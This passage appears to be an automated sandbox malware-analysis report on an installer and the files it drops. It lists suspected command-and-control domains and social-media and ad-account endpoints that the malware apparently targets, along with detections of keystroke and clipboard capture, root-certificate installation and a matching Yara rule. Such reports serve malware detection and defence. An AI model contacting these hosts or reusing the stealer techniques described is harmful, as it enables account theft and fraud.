Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: aliens.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: aliens.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: aliens.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: aliens.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: aliens.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: aliens.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: aliens.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: h1GodtbhC8.exe, 00000000.00000002.794457688.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: h1GodtbhC8.exe, 00000000.00000002.794457688.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	String found in binary or memory: http://ef6df4af06ba6896.xyz/
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009023272.0000000002748000.00000004.00000020.sdmp	String found in binary or memory: http://ef6df4af06ba6896.xyz/:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009023272.0000000002748000.00000004.00000020.sdmp	String found in binary or memory: http://ef6df4af06ba6896.xyz/info/g
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009023272.0000000002748000.00000004.00000020.sdmp	String found in binary or memory: http://ef6df4af06ba6896.xyz/info/gz
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009139131.0000000002781000.00000004.00000020.sdmp	String found in binary or memory: http://ef6df4af06ba6896.xyz/info/w
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	String found in binary or memory: http://ef6df4af06ba6896.xyz/nf
Source: aliens.exe, aliens.exe, 00000006.00000002.1007540272.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1007578546.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000012.00000000.1051421766.0000000000409000.00000002.00020000.sdmp, aliens.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: aliens.exe, 00000006.00000002.1007540272.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1007578546.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000012.00000000.1051421766.0000000000409000.00000002.00020000.sdmp, aliens.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: h1GodtbhC8.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: aliens.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: aliens.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: aliens.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: aliens.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0P
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0R
Source: h1GodtbhC8.exe, 00000000.00000002.794457688.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp, aliens.exe.1.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1014478867.0000000005270000.00000004.00000001.sdmp	String found in binary or memory: http://www.interestvideo.com/video1.php
Source: 1607153318099.exe, 00000013.00000002.995045101.0000000000198000.00000004.00000010.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: 1607153318099.exe	String found in binary or memory: http://www.nirsoft.net/
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info.
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/_/rpc/GaiaInfoService/Get?authuser=0&rpcTrackingId=GaiaInfoService.Get%3A
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/_/rpc/UserByGaiaService/Get?authuser=0&rpcTrackingId=UserByGaiaService.Ge
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/_/rpc/UserCustomerAccessService/List?authuser=0&rpcTrackingId=UserCustome
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/selectaccount
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/selectaccountocation:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.comsec-fetch-dest:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
Source: h1GodtbhC8.exe, 00000000.00000002.804854964.000000006D905000.00000002.00020000.sdmp, Sibuia.dll.0.dr	String found in binary or memory: https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1014478867.0000000005270000.00000004.00000001.sdmp	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: h1GodtbhC8.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: h1GodtbhC8.exe, 00000000.00000002.794457688.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr	String found in binary or memory: https://sectigo.com/CPS0D
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ookie:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.comReferer:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp, aliens.exe.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accept:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/accept:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/login/nonce/
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/origin:
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050F9

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044D1

Creates a DirectInput object (often for capturing keystrokes)

Source: h1GodtbhC8.exe, 00000000.00000002.794689519.00000000008AA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Registers a new ROOT certificate

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe

Code function: 6_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

6_2_1001F720

Protection of GUI:

Contains functionality to create a new desktop

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_6D8A4C20 _DebugHeapAllocator,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,std::ios_base::good,ExpandEnvironmentStringsW,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,Concurrency::details::ContextBase::GetWorkQueueIdentity,GetCurrentThreadId,GetThreadDesktop,CreateDesktopW,GetLastError,SetThreadDesktop,GetLastError,CloseDesktop,CreateProcessW,GetLastError,CloseDesktop,FindCloseChangeNotification,CreateJobObjectW,AssignProcessToJobObject,_DebugHeapAllocator,Sleep,Sleep,_DebugHeapAllocator,SetThreadDesktop,CloseDesktop,TerminateProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,

0_2_6D8A4C20

System Summary:

Malicious sample detected (through community Yara rule)

Source: 15.2.1E1C360C582DF797.exe.5720000.7.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Author: unknown
Source: 15.2.1E1C360C582DF797.exe.5270000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Author: unknown

PE file has a writeable .text section

Source: aliens.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 1E1C360C582DF797.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Contains functionality to call native functions

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019D40 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,		6_2_10019D40
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019F00 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,		6_2_10019F00
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019F50 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,		6_2_10019F50
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019FA0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,		6_2_10019FA0
Source: C:\Users\user\AppData\Roaming\1607153318099.exe	Code function: 19_2_0040C516 NtQuerySystemInformation,		19_2_0040C516
Source: C:\Users\user\AppData\Roaming\1607153318099.exe	Code function: 19_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,		19_2_0040C6FB

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe

Code function: 1_2_008A7165: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

1_2_008A7165

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,

0_2_004038AF

Detected potential crypto function

Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_004079A2		0_2_004079A2
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_004049A8		0_2_004049A8
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_00406EFE		0_2_00406EFE
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_0040737E		0_2_0040737E
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8FFC01		0_2_6D8FFC01
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8FBC5D		0_2_6D8FBC5D
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8F9FF6		0_2_6D8F9FF6
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8EAE3E		0_2_6D8EAE3E
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8ECE40		0_2_6D8ECE40
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8FBB3D		0_2_6D8FBB3D
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8E756E		0_2_6D8E756E
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8E77A0		0_2_6D8E77A0
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8D7714		0_2_6D8D7714
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8E733C		0_2_6D8E733C
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008B65B6		1_2_008B65B6
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008A8525		1_2_008A8525
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008B702F		1_2_008B702F
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008A404E		1_2_008A404E
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008AE1E0		1_2_008AE1E0
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008C0146		1_2_008C0146
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008A326D		1_2_008A326D
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008C055E		1_2_008C055E
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008C457A		1_2_008C457A
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008C47A9		1_2_008C47A9
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008A27D4		1_2_008A27D4
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008AE7E0		1_2_008AE7E0
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008B3731		1_2_008B3731
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008AF8A8		1_2_008AF8A8
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008C0993		1_2_008C0993
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008B39AC		1_2_008B39AC
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008B69EB		1_2_008B69EB
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008CCA20		1_2_008CCA20
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008B5BE7		1_2_008B5BE7
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008B3CDD		1_2_008B3CDD
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008BFC4A		1_2_008BFC4A
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008AEC54		1_2_008AEC54
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008ADDAC		1_2_008ADDAC
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008C0DC8		1_2_008C0DC8
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008ABD53		1_2_008ABD53
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008CCECE		1_2_008CCECE
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008D0FD4		1_2_008D0FD4
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008A5F0C		1_2_008A5F0C
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_00403DA8		6_2_00403DA8
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_00407071		6_2_00407071
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000C063		6_2_1000C063
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000B883		6_2_1000B883
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_100060F0		6_2_100060F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_100169BD		6_2_100169BD
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_100099E0		6_2_100099E0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_100071F0		6_2_100071F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10009257		6_2_10009257
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10010AED		6_2_10010AED
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10008340		6_2_10008340
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000E380		6_2_1000E380
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000ABA0		6_2_1000ABA0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000B3B0		6_2_1000B3B0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1001EBD0		6_2_1001EBD0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_100083F0		6_2_100083F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000BC57		6_2_1000BC57
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000C483		6_2_1000C483
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10010590		6_2_10010590
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1001EDDB		6_2_1001EDDB
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000FF71		6_2_1000FF71
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_0574E58A		15_2_0574E58A
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05743C51		15_2_05743C51
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05762F70		15_2_05762F70
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05760780		15_2_05760780
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_0574C019		15_2_0574C019
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05753BFE		15_2_05753BFE
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000C063		15_2_1000C063
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000B883		15_2_1000B883
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_100060F0		15_2_100060F0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_100169BD		15_2_100169BD
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_100099E0		15_2_100099E0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_100071F0		15_2_100071F0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10009257		15_2_10009257
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10010AED		15_2_10010AED
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10008340		15_2_10008340
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000E380		15_2_1000E380
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000ABA0		15_2_1000ABA0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000B3B0		15_2_1000B3B0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1001EBD0		15_2_1001EBD0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_100083F0		15_2_100083F0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000BC57		15_2_1000BC57
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000C483		15_2_1000C483
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10010590		15_2_10010590
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1001EDDB		15_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000FF71		15_2_1000FF71
Source: C:\Users\user\AppData\Roaming\1607153318099.exe	Code function: 19_2_00404BE4		19_2_00404BE4

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: String function: 6D8A7EA0 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: String function: 05721320 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: String function: 10010534 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: String function: 008BE1C0 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: String function: 008BEB60 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: String function: 008BE0E4 appears 35 times
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: String function: 10010534 appears 35 times
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: String function: 004067A9 appears 58 times

PE file contains strange resources

Source: h1GodtbhC8.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: h1GodtbhC8.exe, 00000000.00000002.804993481.000000006D920000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSibuia.dllN vs h1GodtbhC8.exe
Source: h1GodtbhC8.exe, 00000000.00000002.794780503.0000000000902000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs h1GodtbhC8.exe
Source: h1GodtbhC8.exe, 00000000.00000002.794920585.000000000094E000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameSibClr.dll. vs h1GodtbhC8.exe

Tries to load missing DLLs

